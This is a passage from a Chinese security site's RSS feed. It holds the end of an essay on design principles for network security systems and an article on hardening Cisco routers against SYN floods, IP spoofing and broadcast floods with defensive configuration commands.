网络信息安全的木桶原则是指对信息均衡、全面的进行保护。“木桶的最大容积取决于最短的一块木板”。网络信息系统是一个复杂的计算机系统，它本身在物理上、操作上和管理上的种种漏洞构成了系统的安全脆弱性，尤其是多用户网络系统自身的复杂性、资源共享性使单纯的技术保护防不胜防。攻击者使用的“最易渗透原则”，必然在系统中最薄弱的地方进行攻击。因此，充分、全面、完整地对系统的安全漏洞和安全威胁进行分析，评估和检测（包括模拟攻击）是设计信息安全系统的必要前提条件。安全机制和安全服务设计的首要目的是防止最常用的攻击手段，根本目的是提高整个系统的"安全最低点"的安全性能。 <br/>2．网络信息安全的整体性原则 <br/>　　要求在网络发生被攻击、破坏事件的情况下，必须尽可能地快速恢复网络信息中心的服务，减少损失。因此，信息安全系统应该包括安全防护机制、安全检测机制和安全恢复机制。安全防护机制是根据具体系统存在的各种安全威胁采取的相应的防护措施，避免非法攻击的进行。安全检测机制是检测系统的运行情况，及时发现和制止对系统进行的各种攻击。安全恢复机制是在安全防护机制失效的情况下，进行应急处理和尽量、及时地恢复信息，减少供给的破坏程度。<br/>3．安全性评价与平衡原则 <br/>　　对任何网络，绝对安全难以达到，也不一定是必要的，所以需要建立合理的实用安全性与用户需求评价与平衡体系。安全体系设计要正确处理需求、风险与代价的关系，做到安全性与可用性相容，做到组织上可执行。评价信息是否安全，没有绝对的评判标准和衡量指标，只能决定于系统的用户需求和具体的应用环境，具体取决于系统的规模和范围，系统的性质和信息的重要程度。 <br/>4．标准化与一致性原则 <br/>　　系统是一个庞大的系统工程，其安全体系的设计必须遵循一系列的标准，这样才能确保各个分系统的一致性，使整个系统安全地互联互通、信息共享。 <br/>5．技术与管理相结合原则 <br/>　　安全体系是一个复杂的系统工程，涉及人、技术、操作等要素，单靠技术或单靠管理都不可能实现。因此，必须将各种安全技术与运行管理机制、人员思想教育与技术培训、安全规章制度建设相结合。 <br/>6．统筹规划，分步实施原则 <br/>　　由于政策规定、服务需求的不明朗，环境、条件、时间的变化，攻击手段的进步，安全防护不可能一步到位，可在一个比较全面的安全规划下，根据网络的实际需要，先建立基本的安全体系，保证基本的、必须的安全性。随着今后随着网络规模的扩大及应用的增加，网络应用和复杂程度的变化，网络脆弱性也会不断增加，调整或增强安全防护力度，保证整个网络最根本的安全需求。 <br/>7．等级性原则 <br/>　　等级性原则是指安全层次和安全级别。良好的信息安全系统必然是分为不同等级的，包括对信息保密程度分级，对用户操作权限分级，对网络安全程度分级（安全子网和安全区域），对系统实现结构的分级（应用层、网络层、链路层等），从而针对不同级别的安全对象，提供全面、可选的安全算法和安全体制，以满足网络中不同层次的各种实际需求。 <br/>8．动态发展原则 <br/>　　要根据网络安全的变化不断调整安全措施，适应新的网络环境，满足新的网络安全需求。 <br/>9．易操作性原则 <br/>　　首先，安全措施需要人为去完成，如果措施过于复杂，对人的要求过高，本身就降低了安全性。其次，措施的采用不能影响系统的正常运行。 <br/>六、结束语<br/>　　由于互联网络的开放性和通信协议的安全缺陷，以及在网络环境中数据信息存储和对其访问与处理的分布性特点，网上传输的数据信息很容易泄露和被破坏，网络受到的安全攻击非常严重，因此建立有效的网络安全防范体系就更为迫切。实际上，保障网络安全不但需要参考网络安全的各项标准以形成合理的评估准则，更重要的是必须明确网络安全的框架体系、安全防范的层次结构和系统设计的基本原则，分析网络系统的各个不安全环节，找到安全漏洞，做到有的放矢。 ]]></description>
			<link>https://www.cete.vip/show-3342-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3341-1.html</guid>
			<title>cisco路由器上的几种安全防御措施</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;现在Internet上基于网络层上的黑客攻击越来越普遍，成为网络安全的一大隐患。其实，路由器对于这种攻击也并非完全无能为力，这里就简单介绍几种在Cisco路由器上所能实现的防御手段： 　　　　1．对于D.O.S Attack的防范 　　D.O.S攻击（Deny Of Service）基于TCP协议上三次握手机制进行的攻击手段。TCP协议是面向用户的可靠传输协议，即：在实际传输数据之前，先由发起方（用户）发出一个请求，接受方（服务器）接到这个请求之后，向发起方发出一个确认请求，收到发起方进一步确认之后，才开始实际的数据传输。D.O.S Attack根据这一机制，由黑客通过软件的方法修改自己的源IP地址，向某一服务器发出请求。当服务器向该IP地址发出确认请求之后，由于这个地址是假冒的，所以永远都得不到第三次的请求确认，于是这个中断就被挂起。当黑客在短时间内发起成千上万个这样的请求之后，所有网络资源很快就会被耗尽。同时，所有正常的服务请求也没有资源可以做出应答，造成网络瘫痪。 　　在Cisco路由器上，通过几种方式进行侦测、避免： 　　一、启用service tcp-keepalive-in和schedule process-watchdog terminate。目的是：建立看门狗进程，检查已建立的tcp连接，如果发生不激活或者长时间挂起的情况，中断这样的连接。 　　二、当发现路由器上已经发生异常情况以后，no ip source-route，关闭对于源ip地址的路由检查，避免不必要的资源占用。（请注意，如果在正常情况下，就关闭源路由跟踪的话，容易受到IP电子欺诈。）同时，开启schedule interval xxx（毫秒）。这样就可以硬性指定，为同一个端口中断提供服务时必须间隔一段时间。保证在这个间隔内可以为其他请求提供服务，使网络不至于完全瘫痪。 　　　　2．反IP地址欺骗 　　很多网络攻击依赖于攻击者伪造或者“欺骗”IP数据包的源地址。如果能够在任何可行的地方组织欺骗是有很价值的。这里可以考虑使用访问控制列表的方法，做法有很多种，但是目的是简单的，丢弃那些明显不属于这个接口来源的IP数据包。还有一种可能更加有效的方法，就是用RPF检查。前提是必须是路由对称的情况下（就是A-B的路径必须也是B-A的路径），而且必须支持CEF转发以及相对应的IOS版本支持。它是通过ip verify unicast rpf来启用的，但是之前必须先启用ip cef。 　　　　3．关闭广域网上一些不必要的服务 　　在Cisco路由器上，有很多服务广域网上根本不必要，但是仍然默认开启，反而造成了安全漏洞，给黑客以可乘之机。所以建议予以手工关闭。 　　例如：利用访问控制列表（acl）只开启实际使用的tcp、udp端口。同时，执行no service tcp-small-servers, no service udp-small-servers。这些tcp、udp协议上小服务，平时不常使用，但是这些端口容易被人利用，所以应该关闭。 No ip finger，finger协议主要在unix下使用，类似于Cisco IOS中的show user，如果开启容易被黑客看到连接用户，进一步猜测弱密码，进行合法登陆。如果需要防范密码猜测的风险，在路由器上就应该首先把这个服务关闭。 　　在拨号线路上，一般都采用transport input none，关闭诸如telnet、rlogin等易受攻击的后台程序。 　　　　4．No ip direct-broadcast 　　Ping of death攻击据说最早源于俄罗斯，就是通过许多用户同时对同一目的进行ping，造成flood攻击的效果。但是在实战上效果并不明显。因为在flood的同时，攻击方也必须付出同样的资源。因此，有人对这种攻击手段进行了优化。攻击的目的端从某一特定的ip地址，转换成了类如192.10.6.255这样一个网段广播地址。使这个网段内所有的机器都对这样的请求做出应答，从而达到事半功倍的效果。 　　对应手段为：在路由器广域网接口no ip direct-broadcast，这样除了隔离255.255.255.255的全广播以外，对于类似192.10.6.255网段广播地址也予以隔离，可以大大减少了被flood攻击的风险，也能减少主干线路上不必要的流量。或者，在完成网络上的连通性测试（ping测试）之后，利用访问控制列表，关闭ICMP协议中的echo和echo reply。 　　　　当然，路由器毕竟不是专门的网络安全设备，它所能做的也仅仅能够减少一些基于网络层上的攻击所带来的负面影响，但绝不能完全免疫。而且，在实现上述功能的同时，也是以牺牲部分CPU与内存资源为代价的。此外，它对于一些诸如登陆攻击、所有基于应用层上的攻击手段等则完全无能为力。如果发生这样的问题，还是必须要借助防火墙等专门的安全设备和在系统上进行严格设置等手段配合进行。  ]]></description>
			<link>https://www.cete.vip/show-3341-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
	</channel>
</rss>
